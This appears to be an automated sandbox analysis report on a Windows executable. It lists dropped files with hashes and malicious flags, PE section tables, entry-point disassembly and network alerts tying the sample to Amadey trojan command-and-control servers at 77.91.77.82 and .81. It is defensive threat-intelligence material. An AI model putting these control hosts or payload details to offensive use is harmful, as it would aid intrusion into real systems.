                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):608080
                                                                Entropy (8bit):6.833616094889818
                                                                Encrypted:false
                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):450024
                                                                Entropy (8bit):6.673992339875127
                                                                Encrypted:false
                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2046288
                                                                Entropy (8bit):6.787733948558952
                                                                Encrypted:false
                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):257872
                                                                Entropy (8bit):6.727482641240852
                                                                Encrypted:false
                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):80880
                                                                Entropy (8bit):6.920480786566406
                                                                Encrypted:false
                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2544640
                                                                Entropy (8bit):7.979116909327644
                                                                Encrypted:false
                                                                SSDEEP:49152:fM+AtxmEVG4o6E1MmGcyUB4BmAP0julxkp3tJXpgttFlhTKquE:U+iG4olCms9uUkp3XpgttFlJKqV
                                                                MD5:5DF47A238D51FDAD9B442FEB6C833886
                                                                SHA1:9332EC9A71256CFDEA81CFBF8627F0A274802B1D
                                                                SHA-256:D06E1FD08AF8234EB7D356343329905327126518EEA8BEE8E00F10AEAF7D3A09
                                                                SHA-512:8F0E92E9E7F2BC849819FC6E2C6CD332F2DA8EF41610107ABC34696F27176BB01148C54EF0C6DD1F02642F99BD453B0EFC2F5D58055A543706E16F5EB3E75BBA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.dZ............a.......a.......a...5...............................Z...a.......a.......Rich............................PE..L.....f......................!...................@..........................0............@... .. .... .. .......... ..................................................................................................................................................................@....................@..................@............0!..@......................@............P...p#.. ..................@.............y...#..(..................@....data....."......."..4..............@...........................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2544640
                                                                Entropy (8bit):7.979116909327644
                                                                Encrypted:false
                                                                SSDEEP:49152:fM+AtxmEVG4o6E1MmGcyUB4BmAP0julxkp3tJXpgttFlhTKquE:U+iG4olCms9uUkp3XpgttFlJKqV
                                                                MD5:5DF47A238D51FDAD9B442FEB6C833886
                                                                SHA1:9332EC9A71256CFDEA81CFBF8627F0A274802B1D
                                                                SHA-256:D06E1FD08AF8234EB7D356343329905327126518EEA8BEE8E00F10AEAF7D3A09
                                                                SHA-512:8F0E92E9E7F2BC849819FC6E2C6CD332F2DA8EF41610107ABC34696F27176BB01148C54EF0C6DD1F02642F99BD453B0EFC2F5D58055A543706E16F5EB3E75BBA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.dZ............a.......a.......a...5...............................Z...a.......a.......Rich............................PE..L.....f......................!...................@..........................0............@... .. .... .. .......... ..................................................................................................................................................................@....................@..................@............0!..@......................@............P...p#.. ..................@.............y...#..(..................@....data....."......."..4..............@...........................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1850368
                                                                Entropy (8bit):7.947891331207105
                                                                Encrypted:false
                                                                SSDEEP:49152:xpkVLhYxWoVeqHgj2VgzPaRhHz4XjjBvjkA3zxb:v0qwXaRJ4l3zx
                                                                MD5:1608CACCC377A28575B839E3EEC49314
                                                                SHA1:EE0126916F65D88E92248D9C1BBE5EE2883D2ABE
                                                                SHA-256:BF54E9BA7F3F8D09AEDEF4E6D9D377F16BB085CB5353352A3F1BB5D17F3E1263
                                                                SHA-512:206F4DC5FEDABEC29C3F2428FE6C25AB52BAF438F8D21E26993CE487C9D593825CB1797F1058095F5B4A69B0A35386E8BFBF9733CC4DF5F6F7DDA023B5B483A4
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 42%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....af.............................`I...........@...........................I...........@.................................X...l............................@I..............................@I..................................................... . ............................@....rsrc...............................@....idata ............................@... .p).........................@...ohmzqnep.0... 0..$..................@...ebipawoj.....PI.....................@....taggant.0...`I.."..................@...........................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1850368
                                                                Entropy (8bit):7.947891331207105
                                                                Encrypted:false
                                                                SSDEEP:49152:xpkVLhYxWoVeqHgj2VgzPaRhHz4XjjBvjkA3zxb:v0qwXaRJ4l3zx
                                                                MD5:1608CACCC377A28575B839E3EEC49314
                                                                SHA1:EE0126916F65D88E92248D9C1BBE5EE2883D2ABE
                                                                SHA-256:BF54E9BA7F3F8D09AEDEF4E6D9D377F16BB085CB5353352A3F1BB5D17F3E1263
                                                                SHA-512:206F4DC5FEDABEC29C3F2428FE6C25AB52BAF438F8D21E26993CE487C9D593825CB1797F1058095F5B4A69B0A35386E8BFBF9733CC4DF5F6F7DDA023B5B483A4
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 42%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....af.............................`I...........@...........................I...........@.................................X...l............................@I..............................@I..................................................... . ............................@....rsrc...............................@....idata ............................@... .p).........................@...ohmzqnep.0... 0..$..................@...ebipawoj.....PI.....................@....taggant.0...`I.."..................@...........................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\So7a8eQerR.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1850368
                                                                Entropy (8bit):7.947891331207105
                                                                Encrypted:false
                                                                SSDEEP:49152:xpkVLhYxWoVeqHgj2VgzPaRhHz4XjjBvjkA3zxb:v0qwXaRJ4l3zx
                                                                MD5:1608CACCC377A28575B839E3EEC49314
                                                                SHA1:EE0126916F65D88E92248D9C1BBE5EE2883D2ABE
                                                                SHA-256:BF54E9BA7F3F8D09AEDEF4E6D9D377F16BB085CB5353352A3F1BB5D17F3E1263
                                                                SHA-512:206F4DC5FEDABEC29C3F2428FE6C25AB52BAF438F8D21E26993CE487C9D593825CB1797F1058095F5B4A69B0A35386E8BFBF9733CC4DF5F6F7DDA023B5B483A4
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 42%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....af.............................`I...........@...........................I...........@.................................X...l............................@I..............................@I..................................................... . ............................@....rsrc...............................@....idata ............................@... .p).........................@...ohmzqnep.0... 0..$..................@...ebipawoj.....PI.....................@....taggant.0...`I.."..................@...........................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\So7a8eQerR.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:modified
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:true
                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                Process:C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):0.017262956703125623
                                                                Encrypted:false
                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                Malicious:false
                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):0.017262956703125623
                                                                Encrypted:false
                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                Malicious:false
                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\So7a8eQerR.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):288
                                                                Entropy (8bit):3.45505625661929
                                                                Encrypted:false
                                                                SSDEEP:6:hmPv2WbX4RKUEZ+lX1QYShMl6lm6tPjgsW2YRZuy0l1rst0:hyvNr4RKQ13vg7jzvYRQV1rst0
                                                                MD5:992F533BBC19D85A5D74EB85FC58E498
                                                                SHA1:39B82F939E1ECA46487ADC543ABC055D25012B0C
                                                                SHA-256:206DD716F98A994F638162B807266B39496AB7D914B83F85700F8D17AB1ED5A4
                                                                SHA-512:632FD4C68EE83F0A2995FEFB9EDCD90452F538B4EB51B4643768B625C81945D1A21AE8A2DE5119ADAEBA437CD3717E30B17F3BD0A9230EB541694C989DB550A3
                                                                Malicious:false
                                                                Preview:......../..K.)..}[.F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.d.4.0.9.7.1.b.6.b.\.e.x.p.l.o.r.t.i...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................
                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                Category:dropped
                                                                Size (bytes):1835008
                                                                Entropy (8bit):4.462934315189103
                                                                Encrypted:false
                                                                SSDEEP:6144:pIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN2dwBCswSbn:aXD94+WlLZMM6YFHg+n
                                                                MD5:FC67CDE2494F020E4A97077616ADD287
                                                                SHA1:6C5BA0E82BDCF4D8F3CA953399579E25E929DAD1
                                                                SHA-256:F62FD3C0690532647B64A6F52F664FFB68F03317CB0CBF2056DF48CC5C141723
                                                                SHA-512:BF1E0DCD6099EDB992517C493657FA873C9C3F4DFDF0817A6AE987310B7D7CB753029A9119F2B3ECCBD7397E97C444A6BA975028810FE0D14209C00737FB80E1
                                                                Malicious:false
                                                                Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.W.O................................................................................................................................................................................................................................................................................................................................................"..{........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.947891331207105
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:So7a8eQerR.exe
                                                                File size:1'850'368 bytes
                                                                MD5:1608caccc377a28575b839e3eec49314
                                                                SHA1:ee0126916f65d88e92248d9c1bbe5ee2883d2abe
                                                                SHA256:bf54e9ba7f3f8d09aedef4e6d9d377f16bb085cb5353352a3f1bb5d17f3e1263
                                                                SHA512:206f4dc5fedabec29c3f2428fe6c25ab52baf438f8d21e26993ce487c9d593825cb1797f1058095f5b4a69b0a35386e8bfbf9733cc4df5f6f7dda023b5b483a4
                                                                SSDEEP:49152:xpkVLhYxWoVeqHgj2VgzPaRhHz4XjjBvjkA3zxb:v0qwXaRJ4l3zx
                                                                TLSH:DD8533832EA5ED26E6C4E377D42990CB5F6CCB72D1CD0B09860A739E85973D526D2E30
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                                                                Icon Hash:90cececece8e8eb0
                                                                Entrypoint:0x896000
                                                                Entrypoint Section:.taggant
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x6661EA84 [Thu Jun 6 16:57:40 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:6
                                                                OS Version Minor:0
                                                                File Version Major:6
                                                                File Version Minor:0
                                                                Subsystem Version Major:6
                                                                Subsystem Version Minor:0
                                                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                Instruction
                                                                jmp 00007FA5CC828D2Ah
                                                                hint_nop dword ptr [eax+eax]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                jmp 00007FA5CC82AD25h
                                                                add byte ptr [0000000Ah], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], dh
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax+00000000h], cl
                                                                add byte ptr [eax], al
                                                                add byte ptr [edx], ah
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], cl
                                                                add byte ptr [eax], 00000000h
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                adc byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add eax, 0000000Ah
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], dh
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax+eax], ah
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                and dword ptr [eax], eax
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                push es
                                                                add byte ptr [eax], 00000000h
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                adc byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add eax, 0000000Ah
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], dh
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax+eax], ah
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                and dword ptr [eax], eax
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                or byte ptr [eax+00000000h], al
                                                                add byte ptr [eax], al
                                                                adc byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add eax, 0000000Ah
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], dh
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax+00h], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add dword ptr [eax+00000000h], eax
                                                                add byte ptr [eax], al
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0580x6c.idata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x4940e00x10ohmzqnep
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x4940900x18ohmzqnep
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                0x10000x680000x2dc00fcae0cb33e49da09a07f953a31b6b7f7False0.9984097506830601data7.987398323235003IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x690000x1e00x2007e0a7718a2e2d3a82588d4e9bc5aed95False0.576171875data4.522492340062898IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .idata 0x6a0000x10000x2006e66ae8f9a75bc604a087c954abf8737False0.15234375data1.0684380430289213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                0x6b0000x2970000x2003a9a7a377bc7dc67b6a6656886b2f514unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                ohmzqnep0x3020000x1930000x19240020a50b3d12dfd189189953c7af0354e5False0.9941242376864512data7.952574384600115IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                ebipawoj0x4950000x10000x4007c60b39112f95b48d0690731d3843570False0.7802734375data6.09915223925644IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .taggant0x4960000x30000x2200c593d1f384f4e2d32a781edc93bec964False0.06606158088235294DOS executable (COM)0.8003067680155994IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_MANIFEST0x4940f00x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                DLLImport
                                                                kernel32.dlllstrcpy
                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States
                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                07/05/24-04:23:03.699208TCP2856147ETPRO TROJAN Amadey CnC Activity M34973080192.168.2.477.91.77.82
                                                                07/05/24-04:23:04.625841TCP2856122ETPRO TROJAN Amadey CnC Response M1804973077.91.77.82192.168.2.4
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jul 5, 2024 04:23:03.694149017 CEST4973080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:03.699027061 CEST804973077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:03.699099064 CEST4973080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:03.699208021 CEST4973080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:03.703908920 CEST804973077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:04.401321888 CEST804973077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:04.401379108 CEST4973080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:04.402679920 CEST4973080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:04.407449961 CEST804973077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:04.625840902 CEST804973077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:04.625900030 CEST4973080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:04.628469944 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:04.633249998 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:04.633320093 CEST4973180192.168.2.477.91.77.81
